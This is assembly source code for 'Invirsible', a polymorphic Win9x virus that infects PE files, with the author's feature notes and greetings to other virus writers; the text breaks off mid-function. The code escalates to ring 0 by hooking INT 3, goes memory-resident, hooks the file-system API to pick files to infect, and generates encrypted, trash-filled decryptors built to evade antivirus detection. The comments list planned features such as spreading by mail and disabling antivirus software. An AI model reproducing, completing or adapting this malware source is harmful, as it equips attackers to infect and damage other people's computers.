; Bhunji ; ; proudly presents ;) ; ; Invirsible ; ; Virusinfo ; Version 2 ; Size: Big, usually around 7.6k ; Infects: PE files ; Resident: Yes ; Systems; Win9x ; Polymorhic: Yes ; This is the second version on Invirsible. My goal with this virus ; is to make it as hard as possible to detect. It has one technique ; never seen in a virus before which I call the Guide technique. More ; info about this can be found at www.shadowvx.org. It carries a very ; advanced generic polymorpher. It is able to polymorph mov, add, sub ; so far but its trivial to add more instructions. The engine uses ; emulation to generate code. It is able to emulate memory and registers ; which results in code that looks very real. Coding new code to be ; polymorphed is pretty easy as it's similar to Intel asm. ; ex. mov RX1,[RX2] ; mov Random register 1, [Random register 2] ; Changes since last version ; A total rewrite of the polymorphic code. Works way better now. ; * Changed the polymorphic language to be more similar to Intel asm ; * Added memory emulation, the created code uses the end of .data segment. ; * Deleted advanced register emulation, did hardly create better code ; and was taking up lots of space. ; * Very generic, adding a new instruction needs 10 lines of data/code ; instead of 200-400 lines. ; * An optimiser that deletes the very worst code. (fx. mov eax,eax) ; * The linked list polymorpher will create a six different looking ; decryptors for the generic polymorpher. ; Some changes to the virus ; * Bugfixes. (Doesn't crash on infection :) ) ; * Search for slackspace in .data segment. This space is used by the ; generated code to look more like real code. ; * Recompilation of the code before every infection to make the pointers ; point to the .data slack ; Things to be added in the future. ; * More instructions will be added to the polymorpher ; * A more powerful optimiser ; * Infect on NT too. ; * Spreading by mail ; * Infection of hlp files ; * EPO ; * Deregister the most common AV software on file but register it later in ; memory. This will not happen if the AV gives the virus its proper name. ; * A better method of upgrading the virus ala babylonia. ; And here is an example of what code the engine is able and has been ; able to generate. ; Version 1 ; Version one is able to emulate/generate ; add, mov ; (code is taken from a generated Guide) ; mov ecx, 0Ch ; mov ebx, fs:[ecx] ; get random number ; mov edx, 0 ; add edx, eax ; add eax, esi ; mov edi, 0 ; add edi, 6472DAADh ; mov eax, 5A97451Fh ; mov eax, edx ; add edi, ecx ; mov ecx, 0 ; add ecx, ebx ; or ecx, 8 ; xor ebx, ecx ; 'and' ebx,8 ; add edi, 0DCA7B4AAh ; add edi, 60E4CB5Ch ; mov edi, ebx ; add ebx, offset jumptable ; add ebx, offset jumptable ; jmp dword ptr [ebx] ; patterns ; Differences from the trash code ; fs:[register] ; or/and register,8 ; jmp [register] ; The trashcode ; very few instructions ; no memory instructions ; the same amount of every emulateable instruction (normal code has more ; movs then adds for example) ; unnecessary instructions. Ex. ; mov eax, 5A97451Fh ; this is unnessesary ; mov eax, edx ; as this overwrites eax again ; Version 2 ; Version two is able to emulate ; add, sub, mov, and, or, xor and memory ; Generates on average more movs then the ; adds and more adds then the other opcodes. ; Generates more registers then memory operands and ; more memory operands then numbers. ; The end result 'feels' more like regular code. ; Many many bugfixes. (There are no more bugs i hope) ; Code is taken from a generated decryptor ; ; mov edx, 8D403766h ; xor [4030D7], 1A45h ; 1a45 = virussize ; xor esi, [4030CF] ; mov [4030CF], ecx ; mov esi, 45BBA054h ; add edi, 0CCFC6B5Bh ; mov ebx, 1A45h ; first "real" instruction ; mov eax, [4030CF] ; sub edi, 1A45h ; or eax, ebx ; mov edi, 1A45h ; mov edi, 3 ; add ecx, 3 ; mov edx, [4030BF] ; second ; add [4030D7], eax ; mov esi, 3 ; DecryptLoop: ; pusha ; will be deleted in future versions ; mov eax, 1FF5893Dh ; mov ecx, ebx ; sub eax, 0E138ABECh ; add edx, ecx ; third ; mov esi, ecx ; mov edi, ebx ; mov eax, 0D6E7BEF5h ; mov [4030CF], 5493B89Ch ; sub ecx, [4030B3] ; mov eax, 0E138ABECh ; and [4030D3], ecx ; or eax, ebx ; xor [edx], 0E138ABECh ; decrypt code ; mov [4030D7], 0E138ABECh ; popa ; sub ebx, 4 ; ; jnb DecryptLoop ; mov dword_0_4030CF, 69472C81h ; mov ecx, 0F5D970C4h ; mov edi, 1 ; mov eax, dword_0_4030B7 ; add ecx, 8244076Eh ; If we put the real code pieces together we get. ; ; mov ebx, 1A45h ; VirusSize ; mov edx, [4030BF] ; Where to start decrypt ; DecryptLoop: ; add edx, ecx ; third ; xor dword ptr [edx], 0E138ABECh ; decrypt code ; sub ebx, 4 ; ; jnb DecryptLoop ; The third instruction should add "Where to start" with "VirusSize" but ; as you can see it is added with ecx instead, this is because of the ; emulation. The engine knows that ecx = ebx = VirusSize so it used ecx ; instead. ; patterns ; Differences from the trash code ; pushad/popad ; easy to delete ; [Register] ; engine is only able to create [Number] ; jxx ; Engine isnt able to create jumps yet ; The trashcode ; Still to few instructions, needs push/pop, call, jmp, jxx to look at least ; something like real code. ; Memory instructions isn't able to create memory pointers with a register ; inside, eg [Number+register]. A better compiler will fix this. ; Still unnecessary instructions. Ex. ; mov eax, 0D6E7BEF5h ; this is unnessesary ; ... ; mov eax, 1FF5893Dh ; as this overwrites eax again ; ; Greetings ; (M)asmodeus. Dropper.exe has generated errors and will be closed by ; Windows :))) ; Morphi Hoppas att du f†r det b„ttre i helsingborg ; Prizzy Thanks for helping me with the bug ; Ruzz Yes, i have FINALY finished it :) ; Kamaileon. I wish you luck with the windows programming. ; Clau Hello sister ;) ; Urgo32 Good luck with your next virus. includelib kernel32.lib includelib user32.lib include c:\masm\include\windows.inc .486 .model flat, stdcall ExitProcess PROTO ,:DWORD MessageBoxA PROTO ,:DWORD,:DWORD,:DWORD,:DWORD ; Primes, used them in the first version for advanced register emulation, ; might be usefull in the future Prime1 equ 2 Prime2 equ 3 Prime3 equ 5 Prime4 equ 7 Prime5 equ 11 Prime6 equ 13 Prime7 equ 17 Prime8 equ 19 Prime9 equ 23 Prime10 equ 29 Prime11 equ 31 Prime12 equ 37 Prime13 equ 41 Prime14 equ 43 Prime15 equ 47 Prime16 equ 53 Prime17 equ 59 Prime18 equ 61 Prime19 equ 67 Prime20 equ 71 Prime21 equ 73 Prime22 equ 77 .data VirusStr db "No crack found",0 .code ProgramMain: push 0 call ExitProcess _rsrc segment para public 'DATA' use32 assume cs:_rsrc VirusStart: Main: mov ebx,[esp] push ebp call GetDelta GetDelta: pop ebp sub ebp,offset GetDelta ; address mov [Temp+ebp],ebx ; save offset into kernel .if ebp!=0 ; code that isn't ; executed in the first ; version mov eax,[eax] ; polymorphic code will mov [InfectedProgramOffset+ebp],eax ; move pointer to .endif ; programstart in eax lea eax,BreakPoint1 lea eax,[ebp+GetDelta] ; move some address to mov [PointerToDataSlack+ebp],eax ; PTDS, doesnt matter as ; long as its a working one ; mov eax,fs:[0c] db 67h,64h,0a1h,0ch,00h ; get random number add [RandomNumber+ebp],eax ; (is not random on NT) call GetAPIFunctions ; Get needed API functions call FixTables ; clean the 'dirty' tables ; and allocate mem for the ; polymorpher call CreateGuideAndDecryptor ; Generate the polymorphic ; code call GetResident ; intercept IFSMgr to get ; filenames to infect ReturnToHost: push [MemPtr+ebp] ; free allocated mem used call [LocalFree+ebp] ; by polymorpher mov eax,[InfectedProgramOffset+ebp] ; program address pop ebp ; restore ebp jmp eax ; jmp to program Topic db "You can not find what you can not see.",0 db "Invirsible by Bhunji (Shadow VX)",0 VSize equ VirusEnd-VirusStart VirusSize equ VSize ; how much stack and mem should the polymorpher use NumberOfOffsets equ 10 ; more size = better code ; (doesnt matter right now ; because the engine isnt ; able to create jumps) StackSize equ 100 ; (doesnt matter right now ; because the engine isnt ; able to emulate the stack) MemorySize equ 10 ; The more size the better ; code is produced but makes ; it harder to find a file to ; infect LinesOfTrash equ 3 ; LinesOfTrash is the ; aproximate numbers of ; random instructions between ; every "legal" instruction ; LinesOfTrash ; Fixup instruction ; LinesOfTrash EndValueFrecuency equ 1 ; the higher the more often ; is the EndValue chosed ; the higher the number is ; the harder is it to detect ; my looking at one ; instruction, but its easier ; to detect by looking at many ; instructions. ; 1 is a perfect value MemPtr dd 0 ; ptr to allocated mem ReturnAddress dd 0 ; stores the return address ; in some functions InfectedProgramOffset dd ProgramMain ; where to jump when ; done Temp dd 0 ; just a temporary variable ; API's the virus uses WinFunctions: lstrlenStr db "lstrlen",0 LocalAllocStr db "LocalAlloc",0 LocalFreeStr db "LocalFree",0 db 0 ; pointers to these Functions: lstrlen dd ? AllocMem dd ? LocalFree dd ? FixTables: lea edi,[ZeroRegStart+ebp] mov ecx,(ZeroRegEnd-ZeroRegStart)/4 xor eax,eax rep stosd lea edi,[RandomRegs+ebp] mov ecx,Registers dec eax rep stosd lea edi,[SavedOffsets+ebp] mov ecx,NumberOfOffsets rep stosd lea eax,[EaxTable+ebp] mov [Tables+ebp],eax mov eax,MemorySize*20+StackSize*20 push eax push LMEM_FIXED + LMEM_ZEROINIT call [AllocMem+ebp] mov [Tables+ebp+4],eax add eax,MemorySize*20 mov [Tables+ebp+8],eax call UndefineRegistersAndMem xor eax,eax lea esi,[Mem1Table+ebp] mov edi,[Tables+ebp+4] lodsb mov ecx,eax PredefinedMem: lodsb push edi imul eax,eax,20 lea edi,[edi+eax] push ecx mov ecx,5 rep movsd pop ecx pop edi loop PredefinedMem ret UndefineRegistersAndMem: lea edi,[EaxTable+ebp+4*4] mov ecx,Registers mov eax,Writeable+Undefined SetOpcodeInfo1: stosd add edi,4*4 loop SetOpcodeInfo1 mov edi,[Tables+ebp+4] add edi,4*4 mov ecx,MemorySize+StackSize mov eax,Writeable+Undefined SetOpcodeInfo2: stosd add edi,4*4 loop SetOpcodeInfo2 ret GetModuleHandle dd 0 GetProcAddress dd 0 GetProcAddressStr db "GetProcAddress",0 GetAPIFunctions: mov eax,[Temp+ebp] call GetModuleHandleAndProcAddress mov [GetModuleHandle+ebp],eax mov [GetProcAddress+ebp],ebx xor edx,edx lea edx,[WinFunctions+ebp] xor ecx,ecx CopyWinApiFunctions: push edx push ecx push edx push edx push [GetModuleHandle+ebp] call [GetProcAddress+ebp] mov ecx,[esp+4] mov [Functions+ebp+ecx],eax call [lstrlen+ebp] pop ecx pop edx add edx,eax add ecx,4 inc edx cmp byte ptr [edx],0 jnz CopyWinApiFunctions NoMoreApis: ret ; Input ; eax = somewhere in kernel ; Returns ; eax = GetModuleHandler offset ; ebx = GetProcAddress offset GetModuleHandleAndProcAddress: and eax,0fffff000h ; even 1000h something FindKernelEntry: sub eax,1000h cmp word ptr [eax],'ZM' jnz FindKernelEntry mov ebx,[eax+3ch] cmp word ptr [ebx+eax], 'EP' jne FindKernelEntry mov ebx,[eax+120+ebx] add ebx,eax ; ebx -> Export table mov ecx,[ebx+12] ; ecx -> dll name cmp dword ptr [ecx+eax],'NREK' jz FindGetProcAddress jmp FindKernelEntry ; We can now be sure that eax points to the kernel FindGetProcAddress: lea edi,[GetProcAddressStr+ebp] mov edx,[ebx+32] FindFunction: add edx,4 mov ecx,15 ; length of GetProcAddress,0 mov esi,[edx+eax] push edi add esi,eax repz cmpsb pop edi jne FindFunction sub edx,[ebx+32] shr edx,1 ; ecx = ordinal pointer lea esi,[edx+eax] xor ecx,ecx add esi,[ebx+36] ; esi = base+ordinals+ordnr mov cx,word ptr [esi] ; ecx = ordinal shl ecx,2 ; ecx = ordinal*4 add ecx,[ebx+28] ; ecx = ordinal*4+func tbl addr mov ebx,[ecx+eax] ; esi = function addr in file add ebx,eax ; esi = function addr in mem ret Encryptor dd 0 GetResident: mov eax,[GetModuleHandle+ebp] add eax,6ch mov ebx,'.K3Y' cmp [eax],ebx jz DontGoRing0 sub esp,8 sidt [esp] ; get interupt table ; hook int 3 to get get ring 0 mov esi,[esp+2] add esi, 3*8 ; pointer to int 3 mov ebx, [esi+4] mov bx,word ptr [esi] ; ebx = old pointer lea eax,[Ring0Code+ebp] ; eax = new pointer mov word ptr [esi],ax ; move new pointer to int 3 shr eax,16 mov word ptr [esi+6], ax pushad int 3 ; get into ring 0 popad mov [esi],bx ; return old pointer again shr ebx,16 mov [esi+6],bx add esp,8 DontGoRing0: ret ; --------------------------------------- ; -------------------------------- Ring 0 ; --------------------------------------- Ring0Code: mov eax,[GetModuleHandle+ebp] add eax,6ch mov ebx,'.K3Y' mov [eax],ebx mov ebx,[eax+8] mov [eax+4],ebx mov eax,[MemoryTable+ebp] sub eax,[GuidePos+ebp] push eax add eax,(MemorySize+1)*8 push eax ; push guide + decrypt size ; + special variables add eax,(VirusEnd-VirusStart)*2+20 ; allocate mem push eax push R0_AllocMem mov edi,ebp call vxd pop ecx test eax,eax jz ErrorRing0 ; Copy guide and decryptor to ring 0 mem pop ecx ; ecx = guide + decrypt size ; + special variables mov esi,[GuidePos+ebp] mov edi,eax mov ebx,eax xchg ebx,[GuidePos+ebp] ; eax = new guide pos ; ebx = old guide pos pop edx ; edx = size of guide+decrypt add edx,eax ; edx = new memory pos mov [MemoryTable+ebp],edx sub eax,ebx ; difference in mem add [DecryptorPos+ebp],eax ; add to get new pos rep movsb ; copy polycode to ring 0 mov edi,edx mov ecx,(MemorySize+1)*(8/4) xor eax,eax rep stosd add edx,MemorySize*4+4 mov [VirtualDataSegment+ebp],edx pushad mov eax,[VirtualDataSegment+ebp] ; pointer to virtual data ; segment lea edx,[Mem1Table+ebp] movzx ecx,byte ptr [edx] ; how much data does the ; decryptor and guide need ; predefined inc edx CopyDataToVirtualDataSegment: movzx ebx,byte ptr [edx] ; where in datasegment should ; we write the data shl ebx,2 push dword ptr [edx+1] ; push the data to write pop [eax+ebx] ; write it to virtual data seg add edx,1+5*4 ; point to next data block loop CopyDataToVirtualDataSegment popad mov [VirusInRing0Mem+ebp],edi mov ebx,edi lea esi, [ebp+VirusStart] mov ecx, VirusSize rep movsb ; copy virus to ring 0 xor eax,eax stosd stosd ; encrypt virus in memory pushad mov esi,[Encryptor+ebp] push ebx ; pointer to virus in ring0 mov eax,esp push eax ; pointer to pointer push eax push eax push eax mov [PointerToDataSlack+ebp],esp ; all special variables ; points to pointer to ; virus in ring 0 call Compile call esi add esp,5*4 popad ; copy residentcode to mem push edi lea esi, [ebp+ResidentcodeStart] mov ecx, ResidentcodeEnd-ResidentcodeStart rep movsb ; hook API function ; edi is on stack push InstallFileSystemAPIhook mov edi,ebp call vxd pop edi ; 0 edi left on stack sub edi,ResidentcodeStart mov [edi+BasePtr+1],edi mov [edi+OldAPIFunction],eax BreakPoint1: lea eax,[edi+BreakPoint] lea eax,[edi+BreakPoint] iretd ErrorRing0: pop eax xor eax,eax iretd CreateGuideAndDecryptor: push 1024*1024 push LMEM_FIXED + LMEM_ZEROINIT call [AllocMem+ebp] mov [MemPtr+ebp],eax mov edi,eax lea esi,[Guide+ebp] call LinkedListPolymorpher call Polymorph ; create Guide mov [GuidePos+ebp],esi mov [GuideSize+ebp],eax add edi,32 lea esi,[Decryptor+ebp] call LinkedListPolymorpher push esi call Polymorph ; create Decryptor mov [DecryptorPos+ebp],esi mov [MemoryTable+ebp],edi mov [DecryptorSize+ebp],eax call UndefineRegistersAndMem mov [HowMuchTrash+ebp],0 pop esi pushad mov edi,esi mov eax,Op_trash bswap eax xor ecx,ecx xor edx,edx FindTrashInstruction: inc edi cmp [edi],edx jz EndOfTrashInstructions xor ecx,ecx cmp [edi],eax jnz FindTrashInstruction add edi,4 push eax xor eax,eax stosb pop eax jmp FindTrashInstruction EndOfTrashInstructions: test ecx,ecx jnz ReallyEnd inc ecx add edi,3 jmp FindTrashInstruction ReallyEnd: popad add edi,eax call MutateCode ; Generic polymorphing mov ecx,edi sub ecx,esi shr ecx,1 mov edi,esi FindDecryptInstruction: mov eax,'R[' repnz scasw ; find [R inc edi mov ax,word ptr [edi] cmp eax,',]' ; is this [Rx], jnz FindDecryptInstruction ; if not, continue looking and edi,0fffffff0h mov eax,[edi] bswap eax .if eax==Op_xor jmp CompileEncryptor .elseif eax==Op_add mov eax,Op_sub bswap eax stosd jmp CompileEncryptor .else mov eax,Op_add bswap eax stosd jmp CompileEncryptor .endif CompileEncryptor: mov [Encryptor+ebp],esi ret ; --------------------------------------------------- ; --------------------------- The generic polymorpher ; --------------------------------------------------- ; esi = Data to polymorph ; edi = where to put the created data ; Returns ; esi = start of created data ; edi = end of created data/start of created code ; eax = size of the created code ; Defined opcode looks Op_add equ 'add ' Op_and equ 'and ' Op_mov equ 'mov ' Op_or equ 'or ' Op_sub equ 'sub ' Op_xor equ 'xor ' Op_cmp equ 'cmp ' Op_jnz equ 'jnz ' Op_jnb equ 'jnb ' Op_jna equ 'jna ' Op_jmp equ 'jmp ' Op_offset equ 'ofs ' Op_db equ 'db ' ; output whats in there, ; dont polymorph, ; dont compile Op_dontparse equ '!emu' ; dont polymorph only ; compile ; special opcodes Op_encrypt equ 'cpt ' ; encrypt this operand, ; used to create encryptor/ ; decryptor Op_setinfo equ 'nfo ' ; set info of operand ; used to define a operand ; changable or similar. Op_prefix equ 'pfx ' ; prefix, eg fs:, es: and ; similar. Will be deleted ; in future versions Op_trash equ 'trsh' ; how mush trash to be ; produced, use wisely ; to make your code better ; or when you need to save ; the flags LinkedListPolymorpher: call TablePolymorpher ; 'old' style polymorphics ; esi -> created data ; edi -> created data+sizeof (created data)+1 ret Polymorph: add edi,16 and edi,0fffffff0h push edi push edi call MutateCode ; Generic polymorphing pop edi ; esi -> created data call Optimize ; Optimize the created code ; esi -> created data ; edi -> created data+sizeof (created data)+1 push edi call Compile ; compile the code to get ; the size pop edi pop esi ret Regs equ 6 Registers equ Regs InfoPtr equ 16 ; This polymorher is a bit different from the usuall one. ; It's able to create code that does different things, not just ; the same with a different look. TablePolymorpher: ; A nice recursive function :) xor eax,eax xor ecx,ecx push edi push 0 ReadInstruction: ; 'execute' function mov cl, byte ptr [esi] ; How many bytes to output inc esi rep movsb ParseCall: ; end of this function, ; should we call an other lodsb test eax,eax jz ReturnFromCall ; no, return lea ebx,[esi+eax*4] push ebx ; push return address call Random mov esi,[esi+eax*4] ; address of the function add esi,ebp jmp ReadInstruction ; jmp to function 'executer' ReturnFromCall: pop esi ; return from main function test esi,esi jnz ParseCall NoMoreParsing: xor eax,eax stosd stosd pop esi ret Decryptor: db 0 db 1 dd R0VSize ; dd R0Zero db 1 dd MovePoinerToProgramStart db 0 MovePoinerToProgramStart: db MovePoinerToProgramStartEnd-$-1 db "trsh",LinesOfTrash db "mov R1,[N" dd 1 db "]" MovePoinerToProgramStartEnd: db 0 R0VSize: db R0VSizeEnd-$-1 db "mov RX0,N" dd VSize R0VSizeEnd: db 2 dd R1VirusStart dd R1VirusEnd db 1 dd EncryptRX1 db 1 dd SubR0AndJump db 0 SubR0AndJump: db SubR0AndJumpEnd-$-1 db "db ",1 ; Bytes not to be morphed popad db "trsh",0 db "sub RX0,N" dd 4 db "!emu",9 ; dont do anything about this db "jnb N" dd 0 SubR0AndJumpEnd: db 0 R0Zero: db R0ZeroEnd-$-1 db "mov RX0,N" dd 0 R0ZeroEnd: db 2 dd R1VirusStart dd R1VirusEnd db 1 dd EncryptRX1 db 1 dd AddR0AndJump db 0 AddR0AndJump: db AddR0AndJumpEnd-$-1 db "db ",1 ; Bytes not to be morphed popad db "add RX0,N" dd 4 db "trsh",0 db "!emu",13 ; dont do anything about this db "cmp RX0,N" dd VSize db "!emu",9 ; dont do anything about this db "jna N" dd 0 AddR0AndJumpEnd: db 0 R1VirusStart: db R1VirusStartEnd-$-1 db "mov RX1,[N" dd 3 db "]" db "ofs 0" db "db ",1 pushad db "nfo RX2" dd Undefined db "add RX1,RX0" R1VirusStartEnd: db 0 R1VirusEnd: db R1VirusEndEnd-$-1 db "mov RX1,[N" dd 3 db "]" db "add RX1,N" dd VSize db "ofs 0" db "db ",1 pushad db "nfo RX2" dd Undefined db "sub RX1,RX0" R1VirusEndEnd: db 0 EncryptRX1: db 0 db 1 dd RandomReg db 0 OpcodeXor: db 4 db "xor " db 0 OpcodeAdd: db 4 db "add " db 0 OpcodeSub: db 4 db "sub " db 0 RandomReg: db 0 db 1 dd RandomOpcode db 1 dd RandomizeMemWithReg db 0 RandomizeMemWithReg: db RandomizeMemWithRegEnd-$-1 db "[RX1],N" RandomNumber dd 0 RandomizeMemWithRegEnd: db 0 RandomOpcode: db 0 db 3 dd OpcodeXor dd OpcodeAdd dd OpcodeSub db 0 Guide: db DefinedTrash-$-1 db "trsh",LinesOfTrash DefinedTrash: db 1 ; dd RandomEveryBoot dd RandomEveryTime db 1 dd MakeZeroOrEight db 0 RandomEveryTime: db RandomEveryTimeEnd-$-1 db "pfx ",64h ; prefix fs: db "mov RX0,[N" dd PointerToRandomMemory db "]" ; mov X0, fs:[0ch] RandomEveryTimeEnd: db 0 RandomEveryBoot: db RandomEveryBootEnd-$-1 db "nfo R" RandomEveryBootEnd: db 3 dd RndEcx dd RndEdi dd RndEsi db 0 RndEcx: db RndEcxEnd-$-1 db "3" dd Undefined db "mov RX0,R3" RndEcxEnd: db 0 RndEdi: db RndEdiEnd-$-1 db "5" dd Undefined db "mov RX0,R5" RndEdiEnd: db 0 RndEsi: db RndEsiEnd-$-1 db "6" dd Undefined db "mov RX0,R6" RndEsiEnd: db 0 MakeZeroOrEight: db MakeZeroOrEight-$-1 db "and RX0,N" dd 8 db "add RX0,[N" ; special variable 1 = dd 1 ; pointer to jump table db "]" db "jmp [RX0]" ; jmp [X0] MakeZeroOrEightEnd: db 0 ; --------------------------------------------- ; ---------------- MutateCode ----------------- ; --------------------------------------------- ; ------------- Local variables Prefix dd 0 EndWhere: Trash dd 0 ToReg dd 0 ToMemValue dd 0 ToMemReg dd 0 FromWhere: FromValue dd 0 FromReg dd 0 FromMemValue dd 0 FromMemReg dd 0 TempWhere: TempValue dd 0 TempReg dd 0 TestMemValue dd 0 TestMemReg dd 0 Temp1 dd 0 Temp2 dd 0 Writeable equ 1b Undefined equ 10b ; is has a unknown value Uninitialized equ -1 TableSize equ EbxTable-EaxTable EndValue dd 0 EndTypeOfValue dd 0 Tables: ; pointers to the different ; tables RegTables dd EaxTable MemoryTables dd 0 ; Is allocated later StackTables dd 0 ; first table is EspTable EaxTable: EaxValueNumber dd 0 EaxValueReg dd 0 EaxMemoryNumber dd 0 EaxMemoryReg dd 0 EaxInformation dd Undefined+Writeable EbxTable: dd 0,0,0,0, Undefined+Writeable EcxTable: dd 0,0,0,0, Undefined+Writeable EdxTable: dd 0,0,0,0, Undefined+Writeable EsiTable: dd 0,0,0,0, Undefined+Writeable EdiTable: dd 0,0,0,0, Undefined+Writeable ; this table is copied to mem, its used to define ; starting values for the memory ; Undefined mem start as Undefined+Writeable (you could change this to ; only writable for slightly better code.) Mem1Table: db 4 ; how many tables db 0 ; which table dd 0,0,0,0, Undefined ; program entry point db 1 dd 0,0,0,0, Undefined ; pointer to mem 0 db 2 dd 0,0,0,0, Undefined ; decryptor entry point db 3 dd 0,0,0,0, Undefined ; where to start decrypt RandomRegs: dd Registers dup (-1) ; Random Regs ; mutates the code in esi and places the result in edi ; returns a pointer to the created code in esi ; returns a pointer to the created code + sizeof(created code) in edi MutateCode: push edi MorphCodeLoop: xor eax,eax dec eax push edi lea edi,[ebp+EndWhere] mov ecx,8 rep stosd pop edi call Parse jmp MorphCodeLoop MutateEnd: pop eax ; return address of Parse pop esi add esi,16 and esi,0fffffff0h add edi,10 ret ; ----------------------- Parser ParseSpecialVariables: dd (ParseSpecialVariablesEnd-ParseSpecialVariables-4)/4+1 dd Op_db, Op_encrypt, Op_setinfo, Op_offset, Op_prefix dd Op_trash,Op_dontparse,Op_jmp ParseSpecialVariablesEnd: ParseSpecialProcedures: dd ParseDeclareByte, ParseEncrypt, ParseChangeInfo dd ParseSaveOffset, ParsePrefix, ParseTrash, ParseDontParse dd TemporaryParseJump ParseSpecialProceduresEnd: ParseInstructionData: dd (ParseInstructionDataEnd-ParseInstructionData-4)/4+1 dd Op_add, Op_mov, Op_sub, Op_or, Op_xor, Op_and ParseInstructionDataEnd: AddPos equ 0 MovPos equ 1 SubPos equ 2 OrPos equ 3 XorPos equ 4 AndPos equ 5 InstructionData: AddInfo: dd offset AddInstruction dd Op_add MovInfo: dd offset MovInstruction dd Op_mov SubInfo: dd offset SubInstruction dd Op_sub OrInfo: dd offset OrInstruction dd Op_or XorInfo: dd offset XorInstruction dd Op_xor AndInfo: dd offset AndInstruction dd Op_and InstuctionTablesEnd: Parse: push edi mov ecx,[ParseSpecialVariables+ebp] lea edi,[ParseSpecialVariables+ebp+4] lodsd bswap eax repnz scasd test ecx,ecx jz ParseInstruction pop edi lea ebx,[ParseSpecialProceduresEnd+ebp] imul ecx,ecx,4 sub ebx,ecx mov ebx,[ebx] add ebx,ebp jmp ebx ParseDeclareByte: mov edx,Op_db call OutputOnlyOpcode xor eax,eax lodsb mov ecx,eax stosb ; number of bytes to declare rep movsb ret ParseEncrypt: call GetOperand ret ParseChangeInfo: mov eax,666666h call GetOperand mov ecx,eax lodsd xchg eax,ecx call ChangeInfo ret ParseSaveOffset: mov edx,Op_offset call OutputOnlyOpcode movsb ret ParsePrefix: xor eax,eax lodsb mov [Prefix+ebp],eax ret ParseTrash: xor eax,eax lodsb mov [HowMuchTrash+ebp],eax ret ParseDontParse: xor eax,eax lodsb mov ecx,eax add edi,16 and edi,0fffffff0h rep movsb ret TemporaryParseJump: add edi,16 and edi,0fffffff0h call OutputPrefix mov eax,Op_jmp bswap eax stosd call GetOperand add eax,'0' add eax,']'*256 shl eax,16 mov ax,'R[' stosd ret ParseInstruction: mov ecx,[ParseInstructionData+ebp] lea edi,[ParseInstructionData+ebp+4] repnz scasd pop edi test ecx,ecx jz MutateEnd lea ebx,[InstuctionTablesEnd+ebp] imul ecx,ecx,8 sub ebx,ecx push ebx ParseOperands: call GetOperand sub ebx,4 push ebx ; ToType push eax ; ToOperand inc esi call GetOperand push ebx ; FromTypeOfValue push eax ; FromOperand mov [EndValue+ebp],eax mov [EndTypeOfValue+ebp],ebx call GenerateTrash mov eax,[esp+8] ; ToOperand mov ebx,[esp+12] ; ToType mov ecx,Writeable call DeleteFromInfo pop [FromOperand+ebp] pop [FromTypeOfValue+ebp] pop eax pop ebx mov [ToOperand+ebp],eax mov [ToType+ebp],ebx mov ecx,Writeable call DeleteFromInfo pop [EmulateInstruction+ebp] call OutputPrefix call EmuProc call GenerateTrash ret ; return ; eax = register or number ; ebx = ; 0 = value/number ; 4 = value/register ; 8 = memory/number ; 12 = memory/register ; return ; EBX = 0 if value and 4 if memory ; |'V' or 'M' ; | ; db "M" ReadTypeOfData: xor eax,eax xor ebx,ebx lodsb cmp al,'M' sete bl shl bl,3 ret ; return ; EAX = the number or register ; EBX = 0 if number and 4 if register ; This procedure is in the "copy to ring 0" mem. ;GetOperand: ; xor edx,edx ; mov al,byte ptr [esi] ; cmp al,'[' ; setz dl ; mov ecx,edx ; add esi,edx ; shl edx,3 ; mov ebx,edx ; ebx = 0 or 8 ; lodsb ; cmp al,'S' ; A variable ; jnz Label53 ; mov eax,[PointerToDataSlack+ebp] ; mov edx,[esi] ; mov eax,[eax+edx*4] ; mov [esi],eax ; mov eax,'V' ; xor edx,edx ; ; Label53: ; cmp al,'R' ; setz dl ; shl edx,2 ; add ebx,edx ; ebx = ebx + (0 or 4) ; ; test edx,edx ; is value ; jz ReadValue ; ; xor eax,eax ; lodsb ; read register ; cmp al,'X' ; jz GetRandomReg ; sub eax,'0' ; add esi,ecx ; ret ; ReadValue: ; lodsd ; add esi,ecx ; ret GetRandomReg: push ebx call AsciiToNum add esi,ecx shl eax, 2 lea eax,[eax+ebp+RandomRegs] ; eax -> RandomReg mov ebx,[eax] cmp ebx,Uninitialized jz GetRandomRegPtrInitialize ; There is no RnR ; Xx, create one xchg eax,ebx ; eax = Xx pop ebx ret GetRandomRegPtrInitialize: push eax call GetWriteableReg pop ebx mov [ebx],eax ; Mov RR,Random Operand pop ebx ret ; ----------------------------------------------- ; ---------------------------- Generic polymorher ; ----------------------------------------------- ; This proc takes data from WhereFrom and WhereTo and ; creates instructions from that data. HowMuchTrash dd LinesOfTrash RandomProcs: db 6 ; number of instructions db 6 ; how often it should come up db 2 db 1 db 1 db 1 db 1 dd MovPos dd AddPos dd SubPos dd OrPos dd XorPos dd AndPos GenerateTrash: mov eax,[HowMuchTrash+ebp] ; 1/LinesOfTrash that we ; stop creating trash inc eax call Random test eax,eax jz Return call GetWriteable mov [ToOperand+ebp],eax mov [ToType+ebp],ebx call RandomOperand mov [FromOperand+ebp],eax mov [FromTypeOfValue+ebp],ebx lea ebx,[RandomProcs+ebp] xor eax,eax xor ecx,ecx xor edx,edx mov cl, byte ptr [ebx] Label36: inc ebx mov dl, byte ptr [ebx] add eax,edx loop Label36 call Random lea ebx,[RandomProcs+ebp] Label37: inc ebx mov dl, byte ptr [ebx] sub eax, edx jnc Label37 lea eax,[RandomProcs+ebp] sub ebx,eax dec ebx shl ebx,2 inc ebx mov dl,byte ptr [eax] add ebx,edx add ebx,eax mov ebx,[ebx] lea ebx,[InstructionData+ebx*8+ebp] mov [EmulateInstruction+ebp],ebx call EmuProc jmp GenerateTrash ; ------------------------------------------------ ; ---------------------------- Emulation functions ; ------------------------------------------------ AddInstruction: add [eax+edx],ecx ret SubInstruction: sub [eax+edx],ecx ret MovInstruction: xor ebx,ebx mov dword ptr [eax],ebx mov dword ptr [eax+4],ebx mov dword ptr [eax+8],ebx mov dword ptr [eax+12],ebx mov [eax+edx],ecx ret OrInstruction: or [eax+edx],ecx ret XorInstruction: xor [eax+edx],ecx ret AndInstruction: and [eax+edx],ecx ret EmulateInstruction dd 0 ToOperand dd 0 ToType dd 0 FromOperand dd 0 FromTypeOfValue dd 0 EmuProc: ChangeRegPart: mov eax,[ToOperand+ebp] mov ebx,[ToType+ebp] mov edx,[EmulateInstruction+ebp] mov edx,[edx+4] shr ebx,2 inc ebx call OutputOpcode dec ebx shl ebx,2 call UndefineDependentOperands pushad mov ebx,[EmulateInstruction+ebp] mov ebx,[ebx+4] cmp ebx,Op_mov jnz Label34 mov eax,[ToOperand+ebp] mov ebx,[ToType+ebp] mov ecx,Undefined call 